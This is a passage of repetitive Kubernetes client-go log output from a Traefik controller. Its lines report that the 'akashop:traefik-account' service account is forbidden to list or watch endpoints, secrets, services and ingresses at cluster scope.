reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:18:37.041733 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:19:06.751604 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:19:06.751658 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:19:11.789928 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:19:11.790042 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:19:11.892341 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:19:11.892376 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:19:12.410123 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:19:12.410173 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:19:40.423359 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:19:40.423411 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:19:56.517776 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:19:56.517813 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:19:57.517254 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:19:57.517309 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:20:03.681154 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:20:03.681252 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:20:25.584518 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:20:25.584645 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:20:34.823480 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:20:34.823508 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:20:42.203438 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:20:42.203481 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:20:48.321784 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:20:48.321824 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:21:00.591717 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:21:00.591802 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:21:20.014422 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:21:20.014479 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:21:22.910750 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:21:22.910785 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:21:31.975874 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:21:31.976060 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:21:34.783876 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:21:34.783905 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:22:04.718555 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:22:04.718663 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:22:17.856243 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:22:17.856272 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:22:30.293400 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:22:30.293506 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:22:31.194747 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:22:31.194879 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:22:47.548256 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:22:47.548295 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:22:54.717987 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:22:54.718035 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:23:09.558946 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:23:09.558975 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:23:30.139730 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:23:30.139761 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:23:35.267163 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:23:35.267195 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:23:39.245828 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:23:39.245875 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:23:44.195889 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:23:44.195928 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:24:20.217142 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:24:20.217177 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:24:24.480594 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:24:24.480626 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:24:25.884587 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:24:25.884733 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:24:27.323000 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:24:27.323038 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:25:02.189124 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:25:02.189151 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:25:08.292408 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:25:08.292447 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:25:09.331558 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:25:09.331588 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:25:21.823494 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:25:21.823527 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:25:38.754989 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:25:38.755023 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:25:45.772486 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:25:45.772564 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:25:53.463900 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:25:53.463940 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:26:15.956779 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:26:15.956832 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:26:18.439438 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:26:18.439480 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:26:20.842710 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:26:20.842739 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:26:44.019746 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:26:44.019849 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:27:10.262960 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:27:10.262994 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:27:10.784140 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:27:10.784187 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:27:11.610411 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:27:11.610435 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:27:30.357066 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:27:30.357121 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:27:42.754803 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:27:42.754859 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:28:04.688142 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:28:04.688389 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:28:08.736042 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:28:08.736173 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:28:10.674782 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:28:10.674879 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:28:38.988685 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:28:38.988735 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:28:41.222650 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:28:41.222691 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:28:42.431040 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:28:42.431072 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:29:07.754450 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:29:07.754506 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:29:26.019721 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:29:26.019761 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User 